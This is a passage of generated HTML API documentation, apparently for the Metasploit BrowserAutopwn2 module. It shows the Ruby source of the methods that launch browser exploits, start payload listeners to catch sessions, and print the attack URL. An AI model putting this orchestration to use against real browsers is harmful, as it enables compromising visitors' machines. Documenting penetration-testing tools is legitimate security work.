<span class='const'>Hash</span><span class='lbracket'>[</span><span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='period'>.</span><span class='id identifier rubyid_sort_by'>sort_by</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_k'>k</span><span class='comma'>,</span><span class='id identifier rubyid_v'>v</span><span class='op'>|</span> <span class='id identifier rubyid_k'>k</span><span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_reverse'>reverse</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="start_exploits-instance_method">
#<strong>start_exploits</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Starts exploits.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
445
446
447
448
449
450
451
452
453
454
455
456
457
458</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 445</span>
<span class='kw'>def</span> <span class='id identifier rubyid_start_exploits'>start_exploits</span>
<span class='id identifier rubyid_bap_exploits'>bap_exploits</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='id identifier rubyid_set_exploit_options'>set_exploit_options</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='rparen'>)</span>
<span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_exploit_simple'>exploit_simple</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LocalInput</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>nil</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LocalOutput</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>nil</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Quiet</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>true</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Target</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>0</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Payload</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PAYLOAD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RunAsJob</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>true</span>
<span class='rparen'>)</span>
<span class='ivar'>@exploit_job_ids</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_job_id'>job_id</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="start_payload_listeners-instance_method">
#<strong>start_payload_listeners</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<div class="note notetag">
<strong>Note:</strong>
<div class='inline'>
<p>FireFox payload is skipped because theres no handler for it.</p>
</div>
</div>
<p class="note returns_void">This method returns an undefined value.</p>
<p>Creates payload listeners. The active job IDs will be tracked in #payload_job_ids so that we know how to find them and then clean them up.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#payload_job_ids-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#payload_job_ids (method)">#payload_job_ids</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 305</span>
<span class='kw'>def</span> <span class='id identifier rubyid_start_payload_listeners'>start_payload_listeners</span>
<span class='comment'># Spawn nothing if the user doesn&#39;t want to pop sessions.
</span> <span class='kw'>return</span> <span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>MaxSessionCount</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='comment'># Don&#39;t repeat launching payload handlers
</span> <span class='id identifier rubyid_wanted_payloads'>wanted_payloads</span><span class='period'>.</span><span class='id identifier rubyid_uniq!'>uniq!</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_e'>e</span><span class='op'>|</span> <span class='id identifier rubyid_e'>e</span><span class='lbracket'>[</span><span class='symbol'>:payload_name</span><span class='rbracket'>]</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_wanted_payloads'>wanted_payloads</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_wanted'>wanted</span><span class='op'>|</span>
<span class='id identifier rubyid_multi_handler'>multi_handler</span> <span class='op'>=</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_exploits'>exploits</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>multi/handler</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='comment'># We have to special case firefox
</span> <span class='id identifier rubyid_payload_name'>payload_name</span> <span class='op'>=</span> <span class='id identifier rubyid_wanted'>wanted</span><span class='lbracket'>[</span><span class='symbol'>:payload_name</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>firefox/</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>?</span> <span class='id identifier rubyid_wanted'>wanted</span><span class='lbracket'>[</span><span class='symbol'>:payload_name</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>firefox/</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>generic/</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>:</span> <span class='id identifier rubyid_wanted'>wanted</span><span class='lbracket'>[</span><span class='symbol'>:payload_name</span><span class='rbracket'>]</span>
<span class='comment'># User-configurable options
</span> <span class='comment'># multi_handler.datastore.merge!(self.datastore) could be used, but
</span> <span class='comment'># really expensive. Costs more loading time.
</span> <span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_get_payload_lhost'>get_payload_lhost</span>
<span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PAYLOAD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_payload_name'>payload_name</span>
<span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_wanted'>wanted</span><span class='lbracket'>[</span><span class='symbol'>:payload_lport</span><span class='rbracket'>]</span>
<span class='qwords_beg'>%w(</span><span class='tstring_content'>DebugOptions</span><span class='words_sep'> </span><span class='tstring_content'>PrependMigrate</span><span class='words_sep'> </span><span class='tstring_content'>PrependMigrateProc</span><span class='words_sep'>
</span><span class='tstring_content'>InitialAutoRunScript</span><span class='words_sep'> </span><span class='tstring_content'>AutoRunScript</span><span class='words_sep'> </span><span class='tstring_content'>CAMPAIGN_ID</span><span class='words_sep'> </span><span class='tstring_content'>HandlerSSLCert</span><span class='words_sep'>
</span><span class='tstring_content'>StagerVerifySSLCert</span><span class='words_sep'> </span><span class='tstring_content'>PayloadUUIDTracking</span><span class='words_sep'> </span><span class='tstring_content'>PayloadUUIDName</span><span class='words_sep'>
</span><span class='tstring_content'>IgnoreUnknownPayloads</span><span class='words_sep'> </span><span class='tstring_content'>SessionRetryTotal</span><span class='words_sep'> </span><span class='tstring_content'>SessionRetryWait</span><span class='words_sep'>
</span><span class='tstring_content'>SessionExpirationTimeout</span><span class='words_sep'> </span><span class='tstring_content'>SessionCommunicationTimeout</span><span class='tstring_end'>)</span></span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_opt'>opt</span><span class='op'>|</span>
<span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='id identifier rubyid_opt'>opt</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='id identifier rubyid_opt'>opt</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='id identifier rubyid_opt'>opt</span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='comment'># Configurable only by BAP
</span> <span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ExitOnSession</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXITFUNC</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>thread</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WORKSPACE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_workspace'>workspace</span>
<span class='comment'># Register this module as a child and copy datastore options
</span> <span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_register_parent'>register_parent</span><span class='lparen'>(</span><span class='kw'>self</span><span class='rparen'>)</span>
<span class='comment'># Now we&#39;re ready to start the handler
</span> <span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_exploit_simple'>exploit_simple</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LocalInput</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>nil</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LocalOutput</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>nil</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Payload</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_payload_name'>payload_name</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RunAsJob</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>true</span>
<span class='rparen'>)</span>
<span class='ivar'>@payload_job_ids</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_multi_handler'>multi_handler</span><span class='period'>.</span><span class='id identifier rubyid_job_id'>job_id</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="start_service-instance_method">
#<strong>start_service</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Prints information such as what exploits will be used, and the BAP URL.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 551</span>
<span class='kw'>def</span> <span class='id identifier rubyid_start_service'>start_service</span>
<span class='kw'>super</span>
<span class='id identifier rubyid_show_ready_exploits'>show_ready_exploits</span>
<span class='id identifier rubyid_proto'>proto</span> <span class='op'>=</span> <span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>?</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>https</span><span class='tstring_end'>&quot;</span></span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>http</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_service_srvhost'>service_srvhost</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>!=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0.0.0.0</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_service_srvhost'>service_srvhost</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_service_srvhost'>service_srvhost</span> <span class='op'>=</span> <span class='id identifier rubyid_srvhost_addr'>srvhost_addr</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>!=</span> <span class='int'>0</span>
<span class='id identifier rubyid_srvport'>srvport</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_srvport'>srvport</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_service_uri'>service_uri</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_proto'>proto</span><span class='embexpr_end'>}</span><span class='tstring_content'>://</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_to_authority'>to_authority</span><span class='lparen'>(</span><span class='id identifier rubyid_service_srvhost'>service_srvhost</span><span class='comma'>,</span> <span class='id identifier rubyid_srvport'>srvport</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_get_resource'>get_resource</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Please use the following URL for the browser attack:</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>BrowserAutoPwn URL: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_service_uri'>service_uri</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:20 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink